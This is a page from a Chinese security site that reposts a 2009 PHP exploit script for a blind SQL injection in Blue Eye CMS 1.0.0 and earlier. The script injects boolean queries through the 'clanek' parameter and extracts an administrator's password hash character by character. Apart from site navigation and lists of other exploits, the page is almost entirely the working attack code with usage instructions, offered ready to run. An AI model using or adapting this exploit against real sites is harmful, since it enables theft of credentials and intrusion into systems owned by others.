首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Blue Eye CMS <= 1.0.0 (clanek) Blind SQL Injection Exploit
来源:http://darkjoker.net23.net 作者:darkjoker 发布时间:2009-01-16  
--+++===============================================================+++--
--+++====== Blue Eye CMS <= 1.0.0 Blind SQL Injection Exploit ======+++--
--+++===============================================================+++--


<?php

function usage ()
{
echo
"\n[+] Blue Eye CMS <= 1.0.0 Blind SQL Injection Exploit".
"\n[+] http://kent.dl.sourceforge.net/sourceforge/blueeyecms/blue_eye_cms-1_0_0_preRC.rar".
"\n[+] Author: darkjoker".
"\n[+] Site  : http://darkjoker.net23.net".
"\n[+] Usage : php xpl.php <hostname> <path> <username>".
"\n[+] Ex.   : php xpl.php localhost /BlueEye admin".
"\n\n";
exit ();
}

function query ($user, $pos, $chr)
{
$query = "x' OR ASCII(SUBSTRING((SELECT password FROM blueeye_users WHERE user = '{$user}'),{$pos},1))={$chr} OR '1' = '2";
$query = str_replace (" ", "%20", $query);
$query = str_replace ("'", "%27", $query);
return $query;
}

function decrypt ($hash)
{
$sha1 = unpack ("H*", base64_decode ($hash));
return $sha1 [1];
}

function exploit ($hostname, $path, $user, $pos, $chr)
{
$fp = fsockopen ($hostname, 80);
$chr = ord ($chr);
$query = query ($user, $pos, $chr);

$get =
"GET {$path}/index.php?clanek={$query} HTTP/1.1\r\n".
"Host: {$hostname}\r\n".
"Connection: Close\r\n\r\n";
fputs ($fp, $get);

while (!feof ($fp))
$reply .= fgets ($fp, 1024);

fclose ($fp);

preg_match ("/Autor: (.+?)<br>/", $reply, $x);
if (empty ($x [1]))
return false;
else
return true;
}

if ($argc != 4)
usage ();

$hostname = $argv [1];
$path = $argv [2];
$user = $argv [3];
$key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=";
$pos = 1;
$chr = 0;
echo "\n[+] Finding password: ";
while ($chr < strlen  ($key))
{
if (exploit ($hostname, $path, $user, $pos, $key [$chr]))
{
$pass .= $key [$chr];
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}
echo "\n[+] sha1 Hash: ";
echo decrypt ($pass) . "\n\n";

?>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ciansoft PDFBuilderX 2.2 Activ
·Novell Netware 6.5 ICEbrowser
·Joomla com_Eventing 1.6.x Blin
·Excel Viewer OCX versions 3.1
·Novell Netware 6.5 (ICEbrowser
·NetSurf Web Browser 1.2 Multip
·MetaProducts MetaTreeX V 1.5.1
·The Cisco IOS HTTP server is v
·linux/x86 PUSH reboot() - 30 b
·NetSurf version 1.2 hspace rem
·MPlayer 1.0rc2 TwinVQ Stack Bu
·NetSurf version 1.2 width remo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved